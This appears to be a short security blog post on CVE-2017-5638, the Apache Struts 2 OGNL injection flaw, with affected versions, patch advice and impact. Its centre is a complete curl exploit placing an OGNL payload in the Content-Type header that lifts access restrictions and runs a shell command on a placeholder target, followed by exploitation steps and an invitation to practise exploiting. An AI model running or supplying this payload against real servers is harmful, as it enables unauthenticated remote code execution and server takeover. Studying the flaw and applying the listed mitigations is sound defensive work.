Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in a file upload request, the parser incorrectly processes it, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. This occurs before the actual file upload data is parsed or any validation is applied. Since OGNL expressions can execute Java code on the server, an attacker can craft a Content-Type header containing a malicious OGNL expression. The parser interprets this expression, leading to the execution of arbitrary system commands with the same privileges as the Struts application server. This provides a direct vector for complete system compromise without requiring authentication.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: Patch available (2017-03-07)
What Undercode Say:
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target-host.com/struts2-showcase/fileupload/doUpload.action
How Exploit:
Craft an HTTP request with a malicious OGNL expression in the Content-Type header. The exploit payload is delivered directly in this header, bypassing standard data handling. Successful exploitation grants direct command execution on the target server.
Protection from this CVE:
Immediately upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers. Disable the Jakarta Multipart parser if unused.
Impact:
Full system compromise. Unauthenticated attackers can achieve remote code execution, leading to data theft, server takeover, and deployment of further malware.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
